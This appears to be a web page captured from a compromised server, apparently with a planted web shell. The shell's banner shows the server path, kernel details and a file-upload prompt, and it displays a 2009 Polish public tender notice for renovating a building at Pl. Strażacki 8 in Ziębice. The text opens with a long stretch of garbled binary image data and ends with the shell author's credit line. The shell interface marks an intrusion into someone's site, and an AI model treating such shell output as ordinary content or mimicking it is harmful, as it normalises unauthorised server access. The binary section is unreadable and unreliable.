JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090917/322294-N-2009.html

<p class="kh_header"><b>Ząbkowice Śląskie: Remont pokrycia dachowego, elewacji oraz wymiana stolarki w budynku  przy  Pl. Strażackim nr 8
w Ziębicach.</b><br>
<b>Numer ogłoszenia: 322294 - 2009; data zamieszczenia: 17.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Ząbkowicach Śląskich , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zabkowicki.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pokrycia dachowego, elewacji oraz wymiana stolarki w budynku  przy  Pl. Strażackim nr 8
w Ziębicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia
Remont pokrycia dachowego, elewacji oraz wymiana stolarki w budynku  przy  Pl. Strażackim nr 8
w Ziębicach. 
2. Zakres zamówienia
 Zakres robót budowlanych w budynku:
 - wymiana pokrycia dachu z dachówki karpiówki ceramicznej wraz z ołaceniem,
 - wymiana obróbek blacharskich kominów, koszy, okapów, rynien i rur spustowych,
 - remont instalacji odgromowej (demontaż i montaż wraz z uzupełnieniem),
 - uzupełnienie i przetarcie tynków na kominach ponad dachem,
 - remont czapek kominowych,
 - uzupełnienie i naprawa elementów drewnianych dachu, wraz z czyszczeniem i malowaniem,
 - montaż ław i stopni kominiarskich na dachu,
 - malowanie kominów i elementów metalowych dachu,
 - wymiana stolarki okiennej drewnianej na okna zespolone PCV w całym budynku,
 - wymiana podokienników zewnętrznych,
 - wymiana stolarki drzwiowej drewnianej (drzwi przy wejściu szt.2 i do kotłowni),
 - remont elewacji budynku wraz z malowaniem farbami fasadowymi,
 - remont komina zewnętrznego przy kotłowni,
 - odzysk częściowy dachówki z rozbieranego pokrycia z dachówki karpiówki,
 - wywiezie gruzu na wysypisko,
3. Szczegółowo przedmiot zamówienia określa: 
- przedmiar robót - zał. nr 7 do SIWZ,
- specyfikacje techniczne wykonania i odbioru robót budowlanych - zał. nr 8 SIWZ.
4.Udział Podwykonawców w realizacji zamówienia.
Zamawiający dopuszcza powierzenie wykonania części zamówienia Podwykonawcom.
Wykonawca wskaże w ofercie części zamówienia, które zamierza powierzyć do wykonania Podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.12.11-6, 45.45.30.00-7, 45.31.70.00-2, 45.42.11.25-0, 45.42.11.34-2, 45.26.21.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 5.000 zł.
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
    1) w pieniądzu : 
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z 
        tym że poręczenie kasy jest zawsze poręczeniem pieniężnym:
    3) gwarancjach bankowych:
    4) gwarancjach ubezpieczeniowych: 
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z 
       dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.jedn.
        Dz. U. z 2007r. Nr 42, poz.275). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem  na rachunek bankowy Zamawiającego
     nr 10 9533 0004 2001 0002 6260 0007 w Banku Spółdzielczym w Ząbkowicach Śl.       
     Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego 
     przelewu. Na poleceniu przelewu należy wpisać - Remont pokrycia dachowego, elewacji oraz 
     wymiana stolarki w budynku  przy  Pl. Strażackim nr 8 w Ziębicach.
     W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na 
     rzecz Zamawiającego. Dokumenty, o których mowa w  pkt.2 ppkt. 2 -5  muszą zachowywać 
     ważność przez cały okres, w którym Wykonawca jest związany ofertą. Posiadać zapis o treści: 
     gwarancja płatna nieodwołalnie i bezwarunkowo na pierwsze pisemne żądanie zapłaty 
     Zamawiającego do pełnej sumy wysokości wadium. 
 4.Wadium wnosi się przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium
     w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w 
    art.22 ust.1 ustawy Prawo zamówień publicznych tj,
    1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
        nakładają obowiązek posiadania takich uprawnień,
    2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
        osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych 
        podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
        zamówienia:
        - dysponują kierownikiem budowy, posiadającym uprawnienia budowlane  w specjalności 
           konstrukcyjno-budowlanej legitymującym się minimum 5 letnim doświadczeniem i jest wpisany
           na listę członków właściwej izby samorządu zawodowego. 
    3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
        - posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
           gospodarczej na kwotę min.200.000 zł.
    4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na mocy art. 24 ust.1 i 2 
        ustawy Pzp.
2. Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nie posiadającą 
     osobowości prawnej albo podmioty te występujące wspólnie. W przypadku złożenia oferty 
     wspólnej  warunek  pkt.4 muszą spełniać wszyscy Wykonawcy składający ofertę wspólną, 
     warunek pkt.2 dowolny Wykonawca.
3. W przypadku składania oferty przez Wykonawców występujących wspólnie, Wykonawcy 
    ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo 
     reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
     Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej 
     przez notariusza.
4. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub 
    nienależyte wykonanie zobowiązań   5. W przypadku dokonania wyboru oferty Wykonawcy występującego wspólnie przed przystąpieniem 
    do zawarcia umowy o zamówienie publiczne przedłożona zostanie umowa regulującą współpracę 
    Wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa Wykonawców nie 
    może być krótszy od terminu określonego na wykonanie zamówienia.   6. Opis sposobu dokonywania oceny spełnienia warunków:
    Zamawiający dokonana oceny na podstawie analizy dokumentów dołączonych do oferty, które 
    zostały określone w Specyfikacji Istotnych Warunków Zamówienia zgodnie z formułą spełnia- nie 
    spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu wykazania spełnienia warunków udziału w postępowaniu, określonych w części V.SIWZ, 
każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące dokumenty i oświadczenia:
1. Formularz oferty - z wykorzystaniem wzoru zał. nr 1 do SIWZ,
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
    ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
    terminu składania ofert, 
3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów 
    prawa lub innych dokumentów rejestrowych,
4. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że 
    Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane 
    prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
    wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem 
    terminu składania ofert,
      5. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy 
          Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem 
          opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał 
          przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
          wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące 
          przed upływem terminu składania ofert,
6. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z
    art.22.ust.1 i art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru 
    załącznik nr 5 do SIWZ. 
7. Wykaz wykonanych co najmniej  2-ch robót budowlanych w okresie ostatnich pięciu lat,  a jeżeli 
    okres prowadzenia działalności jest krótszy - w tym okresie, robót odpowiadających swoim 
    rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich 
    wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że 
    roboty te zostały wykonane należycie (referencje) - z wykorzystaniem wzoru załącznik nr 3 do 
    SIWZ,
8. Wykaz osób, które będą pełnić samodzielne funkcje techniczne kierownika budowy wraz z 
    posiadanymi uprawnieniami i zaświadczeniem o przynależności do Okręgowej Izby Samorządu 
    Zawodowego - z wykorzystaniem wzoru załącznik nr 4 do SIWZ,
9. Formularz wyceny robót (kosztorys ofertowy) opracowany w wersji uproszczonej lub skróconej 
    w oparciu o zakres rzeczowy robót ujęty przedmiarze robót oraz wizji lokalnej dla określenia ceny 
    ryczałtowej oferty - z wykorzystaniem wzoru zał. nr 2 do SIWZ,
 10. Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od 
    odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę 
    min.200.000 zł.
 11.Dowód wniesienia wadium. 
 B. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:   1. Zamiast dokumentów, o których mowa w rozdz. VI.A.2, 5 i 6  składa dokument lub dokumenty, 
   wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, 
   że:      1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6
         miesięcy przed upływem terminu składania ofert.      2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo
         że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
         płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie
         wcześniej niż 3 miesiące przed upływem terminu składania ofert.      3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 
          6 miesięcy przed upływem terminu składania ofert.   2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce
     zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt.1) i 2) zastępuje się je 
     dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 
     sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
     odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce 
     zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. VI. 
     A.2, 5 i 6.
C. Dokumenty wymagane w przypadku składania oferty wspólnej:   1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
     ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w 
     postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.  2. Oferta winna zawierać: oświadczenia i dokumenty opisane w rozdz. VI.A.2, 5 i 6 dla każdego partnera z 
     osobna, pozostałe dokumenty składane są wspólnie. 
 
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii o potwierdzonych 
  za zgodność przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy z dopiskiem  
 -za zgodność z oryginałem-. 
 W innym przypadku należy dołączyć stosowne pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zabkowicki.powiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul. Sienkiewicza 11
57-200 Ząbkowice Śl.
pok.110.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 09:00, miejsce: Starostwo Powiatowe
ul. Sienkiewicza 11
57-200 Ząbkowice Śl.
       Kancelaria pok. 202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com